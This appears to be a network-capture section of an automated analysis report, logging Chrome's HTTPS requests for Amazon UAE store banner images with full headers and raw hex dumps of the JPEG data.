                                                                                                                                                                                                                                                                2024-08-12 13:23:34 UTC1378INData Raw: 05 53 30 88 49 3a 70 d5 a2 eb 11 73 02 85 0f 27 64 e7 a7 f5 86 c8 a9 23 e7 7a f6 76 f5 76 ac 17 76 b3 93 1b 44 51 1c 1e 54 8f e3 60 de cb 3d 5f 49 aa 24 75 0c 95 2b 7d 15 2c 82 a8 b6 9a 49 b3 57 a2 a1 88 64 e0 81 11 4b 03 b3 c1 35 4b 95 52 25 13 0e 90 14 51 51 ca 44 4c 39 0d b8 4a 55 08 39 98 a6 a8 f6 e3 8c 7d 3c 99 e5 66 49 43 c4 1a 72 f3 28 9a 71 70 17 2c a9 23 15 cc c7 1d f9 ad a8 de 85 74 45 07 03 3d d9 87 42 d7 2e 88 a1 75 b4 51 0c 51 20 8b 30 3e 1c f5 30 4c d2 07 3f d1 a6 36 aa d2 dc cd 6f 76 62 8f 38 62 e9 0a 64 c7 76 70 c3 16 62 a2 72 8b 37 02 72 16 44 ca 2d 66 68 82 86 92 29 be 5b 22 78 b6 68 73 3c 91 30 72 41 ba 05 32 89 c4 a5 a1 87 43 de 61 32 d6 40 35 8a 8c 87 f6 58 b6 54 40 67 18 1c 5f 2e 54 d2 31 ca ae 0b 0d a9 a5 15 24 63 84 ce 1e 45 b2 c7
                                                                                                                                                                                                                                                                Data Ascii: S0I:ps'd#zvvvDQT`=_I$u+},IWdK5KR%QQDL9JU9}<fICr(qp,#tE=B.uQQ 0>0L?6ovb8bdvpbr7rD-fh)["xhs<0rA2Ca2@5XT@g_.T1$cE
                                                                                                                                                                                                                                                                2024-08-12 13:23:34 UTC1378INData Raw: fd 9d 9f fc 93 ab 70 70 f8 55 5b fc 0c ed 78 a6 91 fd 34 b3 4e 25 f6 cd 91 76 66 0d da bf 9a b8 68 a3 45 c9 48 a9 51 bf 7f 3e 54 8e a8 bd e0 e9 2a f1 66 b5 1c 3a ca 8a 8c 98 8b 75 59 a7 78 92 72 f7 81 78 8d ee f6 3d de a9 16 d9 50 48 c0 ee e2 22 22 98 38 7f 0b 52 48 31 96 68 91 cc 47 5c 1c 3e 15 56 ff 00 03 3b 55 ef a5 af 36 f2 7c 05 68 f8 cc e0 63 55 3a 4e 0b 5e dc ec 45 2b 4d ad 51 d3 92 2e d2 90 84 d1 a8 a0 d2 d5 0b aa 9e ea 5c 49 bf 36 77 fa 8b e4 5e 2b 76 10 75 55 5f 1b 3b 4e 44 cf 84 14 1a 67 49 59 73 5d d5 03 e0 03 09 06 3b 57 6b 6b ca 82 ba 5b 5f fc e2 84 8d 86 a5 19 e2 77 53 2a 82 ab a5 78 14 29 10 ba 46 91 88 10 0c ee 91 49 27 19 ae 76 a1 db f4 3c 68 28 7c ee e1 b1 66 ea dc 23 7e 35 a6 7f 2e bd 9a 70 8a d5 5a b6 6d e0 7e 7d 5d 32 13 3d de 56 de
                                                                                                                                                                                                                                                                Data Ascii: ppU[x4N%vfhEHQ>T*f:uYxrx=PH""8RH1hG\>V;U6|hcU:N^E+MQ.\I6w^+vuU_;NDgIYs];Wkk[_wS*x)FI'v<h(|f#~5.pZm~}]2=V
                                                                                                                                                                                                                                                                2024-08-12 13:23:34 UTC1378INData Raw: 1f dc 51 b6 ce 8f ee 28 db 67 47 f7 14 6d b3 a3 fb 8a 36 d9 d1 fd c5 1b 6c e8 fe e2 8d b6 74 7f 71 46 db 3a 3f b8 a3 6d 9d 1f dc 51 b6 ce 8f ee 28 db 67 47 f7 14 6d b3 a3 fb 8a 36 d9 d1 fd c5 1b 6c e8 fe e2 8d b6 74 7f 71 46 db 3a 3f b8 a3 6d 9d 1f dc 51 b6 ce 8f ee 28 db 67 47 f7 14 6d b3 a3 fb 8a 36 d9 d1 fd c5 1b 6c e8 fe e2 8d b6 74 7f 71 46 db 3a 3f b8 a3 6d 9d 1f dc 51 b6 ce 8f ee 28 db 67 47 f7 14 6d b3 a3 fb 8a 36 d9 d1 fd c5 1b 6c e8 fe e2 8d b6 74 7f 71 46 db 3a 3f b8 a3 60 60 c4 a2 06 2b 34 8a 62 f5 4d fe 7b a9 b8 40 4f 44 56 f3 34 54 25 df 1e a5 77 18 a0 91 2b 27 c2 46 4e 1d eb 44 6b db b2 90 a4 d8 3c 1c 08 fd 8b d6 92 6c 9a 48 b0 70 57 4c 5f 26 45 5a 39 f1 c2 f1 69 d1 ae 8d 77 60 2b 0d 42 44 b4 a7 f9 a0 b5 3c 1d 21 c2 5a a4 9b a8 9e ec f8 b4
                                                                                                                                                                                                                                                                Data Ascii: Q(gGm6ltqF:?mQ(gGm6ltqF:?mQ(gGm6ltqF:?mQ(gGm6ltqF:?``+4bM{@ODV4T%w+'FNDk<lHpWL_&EZ9iw`+BD<!Z
                                                                                                                                                                                                                                                                2024-08-12 13:23:34 UTC1378INData Raw: 7c b5 ed 70 dc 1d 03 5a 0d a2 a8 dc 2c 74 a1 f7 24 29 f2 ef 4f f6 4f cb c2 79 8b db e4 9c c0 2d eb 10 d2 c7 88 83 04 ae ca b8 64 d9 9f 11 1a fa 5e d5 02 e1 da 4e 3b ec fc 79 e4 d6 c6 b1 09 84 76 b2 b1 5f b2 fd 14 e7 8e a1 77 fe 8d 8e f1 71 45 72 1b 32 8e 4e 4e 1e 63 fc 9b 46 d9 67 11 4d 86 0d 97 de 38 3e e8 d4 d0 f1 98 2f 14 0f 59 ab ce 73 c6 66 f4 93 7e fb cf 5e df 05 ce de 4b ae a7 66 79 ab 90 1d a3 f2 9f 75 7e d6 2b da 3d 7a 0f 79 09 45 b2 49 f4 64 63 2a e7 8d 86 76 e4 3b 87 28 ac 62 a8 c6 43 fc a1 88 9a 72 71 46 3c b1 99 48 c3 af 88 37 6f e0 fb e4 eb f1 fc ab 78 bc 7c 58 ff 00 8b 8c 3a bc 07 33 78 1e 8e 7f 4f 92 eb bb 21 e6 ab 6b 70 e4 f2 72 58 e9 5c 9c 6c 5a e5 af 6a f5 ef ef 25 9d f0 f8 49 7f d1 70 aa ac b2 bc a6 24 46 1c 57 26 2b 8d f7 ac 2e 3a 2f
                                                                                                                                                                                                                                                                Data Ascii: |pZ,t$)OOy-d^N;yv_wqEr2NNcFgM8>/Ysf~^Kfyu~+=zyEIdc*v;(bCrqF<H7ox|X:3xO!kprX\lZj%Ip$FW&+.:/


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                92192.168.2.449962151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:34 UTC722OUTGET /images/G/39/Merchandising/BudgetStore/XCM_Manual_1349259_3986217_UAE_Budget_Store_AE_xsite_bubbler_HPC_en_400x400_2X._CB644457597_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:34 UTC659INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 68782
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                X-Amz-IR-Id: 83c71cf9-eaa3-4209-83fe-0f5bba6b4b1e
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Tue, 17 Aug 2021 17:25:24 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Expires: Wed, 20 Jan 2044 13:00:29 GMT
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Age: 1895903
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:34 GMT
                                                                                                                                                                                                                                                                X-Served-By: cache-iad-kiad7000065-IAD, cache-nyc-kteb1890048-NYC
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:34 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 01 01 01 01 01 01 01 01 01 01 02 01 01 01 02 02 02 01 01 02 02 02 02 02 02 02 02 02 03 02 03 03 03 03 02 03 03 04 04 04 04 04 03 05 05 05 05 05 05 07 07 07 07 07 08 08 08 08 08 08 08 08 08 08 01 01 01 01 02 02 02 05 03 03 05 07 05 04 05 07 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 ff c2 00 11 08 01 90 01 90 03 01 11 00 02 11 01 03 11 01 ff c4 00 3b 00 01 00 02 02 02 03 01 01 00 00 00 00 00 00 00 00 00 08 09 07 0a 05 06 02 03 04 01 0b 01 01 00 01 04 03 01 01 00 00 00 00 00 00 00 00 00 00 08 04 05 06 07 02 03 09 01 0a ff da 00 0c 03 01 00 02 10 03 10 00 00 00 df e0 00 00 00 00 00
                                                                                                                                                                                                                                                                Data Ascii: JFIF;
                                                                                                                                                                                                                                                                2024-08-12 13:23:34 UTC1378INData Raw: 36 29 3f 70 5c 9e 87 dd 9a fb 84 fa a9 af 3d 59 d7 3b f5 04 a2 9d fe 56 fa 0d 09 fd 0d f2 2f 7a 88 47 d1 a4 a7 b9 70 f7 1b c9 ed 75 d0 39 fd 80 75 5c af b2 d3 c2 9d 7b b9 6f f1 f9 e9 9c 12 53 57 e4 a0 00 00 03 b1 65 56 7b 59 f6 9a 04 7d 55 9d 02 3e c6 1d bb 5f 9e 60 cb 90 00 00 7d 5e d3 c0 ab 46 c9 6c 9e 74 bc 21 7f 67 64 7e bb 74 e5 9b 6e 77 5e 76 6d e1 67 39 4c 54 9c dd bc 35 b1 f0 7a 6e 6a 3d e8 8f 57 6b d5 13 d2 68 4f 5f 2d b1 4f 2e ac 8d d7 df 98 ae 18 c6 5c c2 37 d7 b3 cd af 4d 68 36 40 c2 cf e8 0d 07 f1 ed 66 7d ab 86 39 9b 7a eb ac 91 f3 b3 10 f2 e5 92 ba ba eb 46 af ee ce 3e 17 ce 59 13 aa 32 b0 00 00 00 2c 0f d3 e8 8d 20 a4 f6 a2 15 ed e5 ec bd c0 71 97 6c 80 00 03 eb f6 aa 05 c9 8b f6 49 8c 78 5e 7c 6e da a7 15 fd a6 ec 16 9d 9d 03 ec 9b a6 e4
                                                                                                                                                                                                                                                                Data Ascii: 6)?p\=Y;V/zGpu9u\{oSWeV{Y}U>_`}^Flt!gd~tnw^vmg9LT5znj=WkhO_-O.\7Mh6@f}9zF>Y2, qlIx^|n
                                                                                                                                                                                                                                                                2024-08-12 13:23:34 UTC1378INData Raw: 2c 93 18 ae 3f 30 3d 86 b8 5c 5e 36 4a 1c 3a ce 00 00 00 07 73 cf f1 af ba e5 4b 8f b5 76 5e 00 00 01 c2 7a b1 0a 27 d6 3b 4b 91 77 c6 37 49 f5 7b de ad 21 36 ff 00 c8 d4 fb 22 69 75 6a 99 45 80 eb dc 91 41 60 af c8 b5 b4 b4 87 f5 97 56 f5 3b be f2 e0 75 a6 de bf a8 ff 00 99 4b 0f b8 b5 3d 6d dc 46 93 73 1d b3 25 75 5c 9c e3 36 7f 9d fb 6e c3 7d fb 9d f3 dc 67 3d 6d ad 19 06 ea ad b8 ea a6 8e 50 db ef 9c d6 1b b1 20 de a2 dd d6 f3 80 47 f9 61 8f e3 20 00 00 00 64 1d a3 88 73 b9 1d af 10 e8 bd 86 00 00 01 ae 27 a3 3b 57 08 5b e5 dc 90 d5 3a e2 cc 37 14 12 d4 ef 74 cd 7b 3d ef d6 1d ee aa b3 9a b2 f4 c4 5c 62 49 ec 31 e3 74 11 d1 2b d8 e8 dd 8b f2 fd a5 c5 eb 2d c3 b1 b4 69 da 72 de ff 00 aa 75 d5 df 58 a5 68 b7 9e 7a d7 5b bb 95 ce 20 e6 db f0 a6 4c 4b 2d
                                                                                                                                                                                                                                                                Data Ascii: ,?0=\^6J:sKv^z';Kw7I{!6"iujEA`V;uK=mFs%u\6n}g=mP Ga ds';W[:7t{=\bI1t+-iruXhz[ LK-
                                                                                                                                                                                                                                                                2024-08-12 13:23:34 UTC1378INData Raw: de 2d 15 b5 6f 22 f5 65 83 e8 fd 87 f9 f5 5f 3b bf 5e 56 ae ff 00 d6 9e fe 1c ed b2 32 6d ba 8f 93 ba 87 25 58 2e 77 e7 0a b7 ff 00 72 b5 56 61 ac ae cd 40 13 66 3e cf bd 29 b0 3b c5 9e be b4 a4 0e b2 bc 98 7b bc e4 ae bf c9 80 02 52 4c ad 15 38 7d 12 8b c0 00 38 5b 05 ca ae 7c 70 9d 3d 6b 11 bd 80 00 00 00 00 00 00 00 00 00 00 00 00 00 03 b2 e5 d6 4b 46 f6 3e 0b 73 57 fb 68 00 01 82 a3 8e d3 af 0f 2c e6 17 e7 1f a0 00 00 00 00 00 00 00 00 00 00 00 00 00 3f 79 7c b0 ff 00 53 21 ee 75 91 da b0 00 00 03 aa 61 57 ff 00 4f 4f 60 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 77 77 5f 6b cd 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 52 15 ca 8a ef 6d b5 b4 67 74 a0 bc cb 5d 78 00 6b 05
                                                                                                                                                                                                                                                                Data Ascii: -o"e_;^V2m%X.wrVa@f>);{RL8}8[|p=kKF>sWh,?y|S!uaWOO`ww_klRmgt]xk
                                                                                                                                                                                                                                                                2024-08-12 13:23:34 UTC1378INData Raw: 57 ff 00 06 26 e3 df 7d 8f b1 0e 3d f5 5a 2f d1 0a 63 df 3d a7 da 1a 61 d9 8e db 45 d0 e8 98 ad 9b cc 88 4c 71 51 f2 b6 35 c5 1f 6f ad 34 f7 0e 70 c5 01 a4 c8 7f 08 00 6a bc c4 cc d9 c2 a2 3c 7a c7 2b 4a 5e 3b c3 2a 32 75 7b 59 09 b3 54 8f ed ee 4c a5 99 6b a2 ae 66 b6 90 8f 14 59 06 13 91 2b 2d 60 5c c4 6c da e9 1c c4 77 2a a6 ef 98 c1 97 c6 6f 0d eb e7 1b eb f4 32 4e 91 c6 af 5e ff 00 a0 8e 72 bd ca e7 2e ae 77 7a fc 04 88 77 76 a3 70 e8 c5 6f 89 34 c7 0d d8 41 3d dd 89 eb c2 b4 82 29 e3 19 bb 24 45 7a 8c ec 03 78 8f 44 f5 61 2b 62 20 f6 ba 58 9b 23 4d dc 13 b5 a3 7e 88 bd f8 5e e7 62 b4 04 2c 28 5a 1b 51 2b 53 7c 60 69 c3 d1 a8 d4 6b 75 46 fb 99 f4 af 0e 54 b5 56 3b 63 89 c2 66 b7 8b ac e0 aa f6 ab 23 b1 11 47 c3 e4 87 e4 37 88 e2 27 97 0f 67 53 5e f9
                                                                                                                                                                                                                                                                Data Ascii: W&}=Z/c=aELqQ5o4pj<z+J^;*2u{YTLkfY+-`\lw*o2N^r.wzwvpo4A=)$EzxDa+b X#M~^b,(ZQ+S|`ikuFTV;cf#G7'gS^
                                                                                                                                                                                                                                                                2024-08-12 13:23:34 UTC1378INData Raw: 96 6b bd 55 46 bb d7 c2 ec 00 a4 5e c6 21 c2 82 21 11 ce e9 0b 5e ba 72 2e bd 81 8e 98 ab e2 25 bd 52 85 ad 71 92 40 78 4d 1e 5c b0 8b 60 b3 01 52 28 24 52 4b 49 08 fa a9 71 2b a7 4a ac 13 88 29 c0 9a c2 4f 91 1e fa 70 4c c9 93 e3 14 79 89 05 26 a2 a0 d4 d3 6d a6 f3 8e 84 39 67 49 64 7b ab e0 0a fb 9f 96 92 df 06 79 05 22 39 c9 83 42 8f 16 0c 43 07 86 9c ce bc 34 84 bb 33 d5 62 a7 ac ad f7 2d f2 c4 fb 5b e9 a4 8c e8 cd 47 6c 76 c8 9d 1f db 76 7e 59 0d 8b 89 3d 1c 5b 15 51 c4 bd 10 be ef ec c2 c1 55 3f e2 05 57 7a b0 6e 8f 6e 5a c4 47 db 44 36 98 9d 91 ed 40 37 91 d2 22 6c 6f 89 f5 01 74 6a aa e0 3d 11 1e 10 09 af f4 95 c5 de 0d 9e b1 7b b6 24 df 23 6f a8 7d 9e 86 b3 c4 4f c4 ec 5c da 2d 45 72 cb 60 39 a2 ab c6 30 02 7d e9 61 ce 91 05 62 a2 6d 84 e9 40 3c
                                                                                                                                                                                                                                                                Data Ascii: kUF^!!^r.%Rq@xM\`R($RKIq+J)OpLy&m9gId{y"9BC43b-[Glvv~Y=[QU?WznnZGD6@7"lotj={$#o}O\-Er`90}abm@<
                                                                                                                                                                                                                                                                2024-08-12 13:23:34 UTC1378INData Raw: cc a6 48 d1 80 43 49 e5 e2 3f 88 37 2e 57 09 53 8d 25 b6 f1 2c e1 9d a9 b5 b0 49 ad 85 a0 d0 48 c4 47 35 78 8b e1 76 23 b9 1e ee 0a b9 9a ea fd 83 e9 19 57 af fc ad 55 79 78 fa e2 a6 23 db 6f 52 bc 46 b9 14 e1 ed 3c cb 28 f6 f3 de fb fd 23 c1 92 af 75 60 a7 5c 1e 38 36 e6 b1 4a 72 87 b0 a5 bb e6 18 32 87 33 89 c3 d7 8e 3c 44 7e 62 b0 e2 c2 0e 63 1c bb 10 b1 8a 57 4d 85 99 1e af 74 3b 31 8d 37 ee 10 92 b7 36 39 f1 1c 6b 66 27 04 ce 7c 8c 59 7e d4 97 f9 d6 61 a8 8a de df ab 12 cc c6 1d 91 e3 0f 89 34 ac 77 91 0e 78 6b e1 f9 45 e7 24 2f 7b 2c 6f ad a5 2b 98 d3 f2 22 fb 08 21 ef e2 39 38 85 f6 b1 bc 38 3e 0b 8a 5d dd 5c 0d 53 b3 cb db e9 2a dd e7 9e df b4 dc 58 2e b2 89 f7 69 e8 95 9b 9f 07 b5 bf 2c 6f 9a 1b d4 d5 73 f8 92 76 a2 f3 0c 64 9c a9 10 80 b1 af 79
                                                                                                                                                                                                                                                                Data Ascii: HCI?7.WS%,IHG5xv#WUyx#oRF<(#u`\86Jr23<D~bcWMt;1769kf'|Y~a4wxkE$/{,o+"!988>]\S*X.i,osvdy
                                                                                                                                                                                                                                                                2024-08-12 13:23:34 UTC1378INData Raw: c2 62 99 51 6b 63 69 ea dc 8b e9 23 fc a0 1f 89 b8 95 f2 93 7e 25 f4 55 ef 1b 78 9a 91 a9 e5 3f 0b 20 3e 57 9e 1f d3 c3 89 e4 93 86 e6 ef f2 b8 6b 34 19 81 d1 b5 23 23 ba 57 66 ec 44 cd 71 63 c5 18 c6 e7 3d ec ef c0 b3 aa 37 4f 30 ed 13 4e d8 79 be bc aa 8d 79 1a 3f ba 5b ab ac 90 4f dc 44 70 35 58 e5 09 42 2d e9 c6 71 75 47 26 f1 77 8c db 53 44 57 72 e6 e9 07 7f be 79 7b f5 dd b0 18 44 47 09 8a aa ae d1 18 8d c4 2f 8e 18 7c 1a 2f 90 91 c9 b0 3a 91 da af 6a a0 db e5 07 c8 d4 ca cd 15 98 ce 6c 4e ae ad 32 33 66 e3 39 15 03 dc 98 6b bb 31 4f fa d3 4f fc c0 71 2b e5 d3 3f 88 ec 45 68 55 3c a2 a8 b1 cb b4 88 f4 69 18 4d 35 ec 3d 64 77 ef 72 70 9c 88 9d b8 65 44 66 23 1c 36 0f 73 b4 d8 80 88 82 da dd e2 66 ed 7b 0a 31 23 75 59 89 b5 3c 68 4c 52 7e 8d 07 ef 27
                                                                                                                                                                                                                                                                Data Ascii: bQkci#~%Ux? >Wk4##WfDqc=7O0Nyy?[ODp5XB-quG&wSDWry{DG/|/:jlN23f9k1OOq+?EhU<iM5=dwrpeDf#6sf{1#uY<hLR~'
                                                                                                                                                                                                                                                                2024-08-12 13:23:34 UTC1378INData Raw: 39 d4 f5 4e 72 ee 73 a3 01 5c ec 32 54 52 3f 86 39 2c 21 13 fb bc 16 4c 70 69 c7 3b 03 af 76 3a 47 54 72 52 aa 2e a8 bc c6 8b 5b fa 3a 07 f0 45 82 c8 8e 0d 38 e7 60 75 ee c3 08 c2 b5 1e 37 a1 18 bd cf c2 aa 37 b5 cb a7 bb 9e 2c 24 71 2b 69 e0 91 59 26 53 d1 ce c6 46 b0 91 c6 b2 a7 9c 47 3e 40 1d bd 9e e5 5c 6b 2b bb 59 30 85 68 48 fb 78 8f dd ef 26 eb ff 00 50 ae 0b 12 45 5e 53 99 18 b2 94 f2 23 80 ff 00 95 65 ea 9b 2b f1 c9 23 6e 8b 17 96 56 a6 93 aa f3 46 5c 1a cf 8b 6c f9 91 c5 f1 c9 97 2f 19 7b 07 8c ad 41 c9 0a ed 94 2c 66 1b 86 d2 56 92 5e 9b ce ef 22 28 eb f2 ed b6 67 12 59 5a d9 b8 41 37 68 47 49 96 a5 52 cc e2 36 dd f2 a1 6d 56 f2 99 ce fe 5c 37 82 a6 b9 ca 39 52 93 52 95 72 14 e5 07 33 d6 ca b6 9a 6b a6 4c be 97 24 a7 a7 b2 7a 92 44 74 55 09 3e
                                                                                                                                                                                                                                                                Data Ascii: 9Nrs\2TR?9,!Lpi;v:GTrR.[:E8`u77,$q+iY&SFG>@\k+Y0hHx&PE^S#e+#nVF\l/{A,fV^"(gYZA7hGIR6mV\79RRr3kL$zDtU>
                                                                                                                                                                                                                                                                2024-08-12 13:23:34 UTC1378INData Raw: da a1 6a aa f7 af 2f 1f d8 33 1c bc 7f 60 cc 72 f1 fd 83 31 cb c7 f6 0c c7 2f 1f d8 33 1c bc 7f 60 cc 72 f1 fd 83 31 cb c7 f6 0c c7 2f 1f d8 33 1c bc 7f 60 cc 72 f1 fd 83 31 cb c7 f6 0c c7 2f 1f d8 33 1c bc 7f 60 cc 72 f1 fd 83 31 cb c7 f6 0c c7 2f 1f d8 33 1c bc 7f 60 cc 72 f1 fd 83 31 cb c7 f6 0c c7 2f 1f d8 33 1c bc 7f 60 cc 72 f1 fd 83 31 cb c7 f6 0c c7 2f 1f d8 33 1c bc 7f 60 cc 72 f1 fd 83 31 cb c7 f6 0c c7 2f 1f d8 33 1c bc 7f 60 cc 72 f1 fd 83 31 cb c7 f6 0c c7 2f 1f d8 33 1c bc 7f 60 cc 72 f1 fd 83 31 cb c7 f6 0c c7 2f 1f d8 33 1c bc 7f 60 cc 70 00 9d a8 16 a2 a7 72 ff 00 ee bc c7 9b df 43 6d 57 58 d8 29 25 2c 76 ea 6c 5c 67 17 d5 66 5a ca 04 80 86 6d 82 c7 45 95 f0 60 e6 2b 83 74 81 2e 90 93 37 56 0b 89 b2 35 c5 b4 4a 48 24 b1 9b bb 97 12 b5 1d
                                                                                                                                                                                                                                                                Data Ascii: j/3`r1/3`r1/3`r1/3`r1/3`r1/3`r1/3`r1/3`r1/3`r1/3`prCmWX)%,vl\gfZmE`+t.7V5JH$


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                93192.168.2.449964151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:34 UTC722OUTGET /images/G/39/Merchandising/BudgetStore/XCM_Manual_1349259_3986221_UAE_Budget_Store_AE_xsite_electronics_en_400x400_2X._CB644457597_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:34 UTC660INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 50354
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                X-Amz-IR-Id: f1799056-ab41-4b42-8c2a-23c08c5de8eb
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Tue, 17 Aug 2021 17:25:25 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Expires: Thu, 24 Mar 2044 11:36:33 GMT
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: MISS
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Age: 1237532
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:34 GMT
                                                                                                                                                                                                                                                                X-Served-By: cache-iad-kjyo7100138-IAD, cache-nyc-kteb1890099-NYC
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:34 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 01 01 01 01 01 01 01 01 01 01 02 01 01 01 02 02 02 01 01 02 02 02 02 02 02 02 02 02 03 02 03 03 03 03 02 03 03 04 04 04 04 04 03 05 05 05 05 05 05 07 07 07 07 07 08 08 08 08 08 08 08 08 08 08 01 01 01 01 02 02 02 05 03 03 05 07 05 04 05 07 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 08 ff c2 00 11 08 01 90 01 90 03 01 11 00 02 11 01 03 11 01 ff c4 00 3a 00 01 00 01 05 00 03 01 01 00 00 00 00 00 00 00 00 00 09 05 06 07 08 0a 02 03 04 01 0b 01 01 00 01 04 03 01 00 00 00 00 00 00 00 00 00 00 00 08 05 06 07 09 01 02 03 04 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 ef e0 00 00 00 00 00 00
                                                                                                                                                                                                                                                                Data Ascii: JFIF:
                                                                                                                                                                                                                                                                2024-08-12 13:23:34 UTC1378INData Raw: c5 36 96 a7 bd bb 6a 56 00 00 00 33 ae ef f5 f9 c4 4d 67 e2 d2 8e 19 a7 b7 12 de e9 12 bc 76 93 77 3b a3 cf 58 6d f1 fa 6e 1b 36 bf d6 9e 97 a7 58 00 00 22 e6 4f e2 38 78 96 d8 63 ac 6d 5a cb df 7f c9 ec 00 00 00 00 02 e2 ba a8 f2 b3 ba 68 11 f5 7d 9e 03 5f 63 0e 5d 8f cd 60 cb 90 00 00 01 8b 77 7b af e8 67 fb fe db d6 d7 cc f7 7d b1 99 e5 2a f6 8e f6 e5 d1 86 2f fe 79 d2 5e 9d f9 87 f3 f5 dc ab 46 bb d5 46 96 27 78 00 00 39 bf dc 54 1b 85 8c c1 66 df 18 1b 21 77 41 aa 19 93 f7 d3 3e b0 00 00 00 00 12 07 b3 e8 8d b0 52 7b 11 08 f6 d5 ec bd c0 71 97 2c 80 00 00 0d 85 dd fe bf 34 d2 81 9e f1 ff 00 c5 75 e5 ea 8d 9f b7 77 96 02 c6 fe bf 1d 2b 94 62 f9 f6 e3 ef af bd 52 cd b8 3b f4 d2 dc ed 00 00 04 28 ed 86 1a 68 86 5c b2 f6 fe 06 c8 99 dd 87 19 d3 f7 cf b0
